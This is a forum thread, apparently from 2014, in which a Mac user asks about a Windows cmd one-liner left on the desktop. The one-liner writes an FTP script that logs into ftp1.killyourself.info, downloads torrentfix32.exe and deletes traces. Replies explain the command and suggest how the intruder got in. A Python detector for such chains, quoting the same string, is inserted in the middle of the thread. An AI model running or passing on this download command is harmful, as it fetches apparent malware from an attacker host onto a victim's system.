Hacker on board

Posted in Genius Bar, edited January 2014
It appears that I've got someone trying to access my home system.



The hacker was able to change a file name on my desktop. I found this hacker while using Firefox. The hacker was trying to search via Firefox search for:



cmd /c echo open ftp1.killyourself.info 21 .. ik 7echo user mysql database .. ik 7echo binary .. ik 7echo get torrentfix32.exe .. ik 7echo bye .. ik 7ftp -n -v -s;ik 7del ik 7torrentfix32.exe 7exit



This is also what the hacker renamed my existing file to on my desktop.



What type of program was this person trying to run?



Aphyd

Comments

  • Reply 1 of 6
    teedoff087 Posts: 348 member
    Looks like a Windows hacker. He didn't really do anything. You're not running a Windows computer are you? If you are, you need to run antivirus. I recommend Avast! Antivirus. It's slim on resources and free.
  • Reply 2 of 6
    aphyd Posts: 4 member
    Quote:
    Originally Posted by teedoff087


    Looks like a Windows hacker. He didn't really do anything. You're not running a Windows computer are you? If you are, you need to run antivirus. I recommend Avast! Antivirus. It's slim on resources and free.



    Not running a Windows box. I tracked his IP address to Malaysia. Tough to pursue this guy if I wanted to.
  • Reply 3 of 6
    Marvin Posts: 15,393 moderator
    http://people.ubuntu.com/~fabbione/i...007-06-03.html

    http://www.macfixitforums.com/showfl...99&Search=true



    The command he tried to execute mounts an ftp server at ftp1.killyourself.info. You can mount this yourself via a browser or the Finder with the username mysql and password database. It then copies the file torrentfix32.exe over. I don't know if that is some trojan that allows more access to the system or is just a virus. Suffice to say it's a Windows executable and the command he tried to run would only work correctly on Windows.



    As mentioned in the above links, check to see if you have an insecure IRC client or VNC server or something - that's possibly how he was able to save/rename a file.
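An added example, not part of the thread: a small detector for the pattern the reply above describes, where a command line writes an FTP script with `echo`, runs `ftp` against that script, and then references the fetched file. The function names, host labels (`ws-01` and so on) and the record layout are assumptions made for this illustration; the flagged string is copied as it appears in the original post.

```python
import re

# Verbs of the FTP script that the command writes out line by line with "echo".
OPEN_RE = re.compile(r"echo\s+open\s+(\S+)(?:\s+(\d{1,5})(?!\S))?", re.I)
USER_RE = re.compile(r"echo\s+user\s+(\S+)", re.I)
GET_RE = re.compile(r"echo\s+get\s+(\S+)", re.I)
# ftp started with a script file. ':' is the real separator after -s; ';' is
# accepted too because that is how the string appears in the post.
FTP_RE = re.compile(r"ftp\s+(?:-\w+\s+)*-s[:;]\S+", re.I)

# The string exactly as quoted in the original post (separators are garbled).
POST_STRING = (
    "cmd /c echo open ftp1.killyourself.info 21 .. ik 7echo user mysql "
    "database .. ik 7echo binary .. ik 7echo get torrentfix32.exe .. ik "
    "7echo bye .. ik 7ftp -n -v -s;ik 7del ik 7torrentfix32.exe 7exit"
)

# Constructed process-creation records (host, command line), not real logs.
SAMPLE_EVENTS = [
    ("ws-01", "cmd /c echo build finished"),
    ("ws-02", "ftp -s:nightly_upload.txt backup.example.net"),
    ("ws-03", POST_STRING),
]

def analyze(cmdline):
    """Describe an echo-built FTP download chain, or return None."""
    opened = OPEN_RE.search(cmdline)
    files = GET_RE.findall(cmdline)
    scripted = FTP_RE.search(cmdline)
    if not (opened and files and scripted):
        return None
    user = USER_RE.search(cmdline)
    tail = cmdline[scripted.end():].lower()
    return {
        "host": opened.group(1),
        "port": int(opened.group(2) or 21),
        "user": user.group(1) if user else None,
        "files": files,
        # The fetched name shows up again after the ftp call.
        "referenced_after_fetch": any(f.lower() in tail for f in files),
    }

def flagged(events):
    return [(h, r) for h, c in events if (r := analyze(c)) is not None]

if __name__ == "__main__":
    for host, finding in flagged(SAMPLE_EVENTS):
        print(host, finding)
```

Only the third record is reported; a plain `ftp -s:` run by an administrator is not flagged because no script is being assembled with `echo` on the same command line.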
  • Reply 4 of 6
    This entire situation could make a great mac commercial.
  • Reply 5 of 6
    SpamSandwich Posts: 33,407 member
    Quote:
    Originally Posted by aphyd


    Not running a Windows box. I tracked his IP address to Malaysia. Tough to pursue this guy if I wanted to.



    But this happened on your Mac while you were running Windows? Did you boot into Windows with Boot Camp, were you running Windows with Parallels?
  • Reply 6 of 6
    lundy Posts: 4,466 member
    Quote:
    Originally Posted by aphyd


    Not running a Windows box. I tracked his IP address to Malaysia. Tough to pursue this guy if I wanted to.



    Malaysia has a boatload of open anonymous proxies. So the IP means nothing - he could even be down the street from you. Do you have any script kiddie friends or neighbors who have been ranting at you about Macs not being "invulnerable?"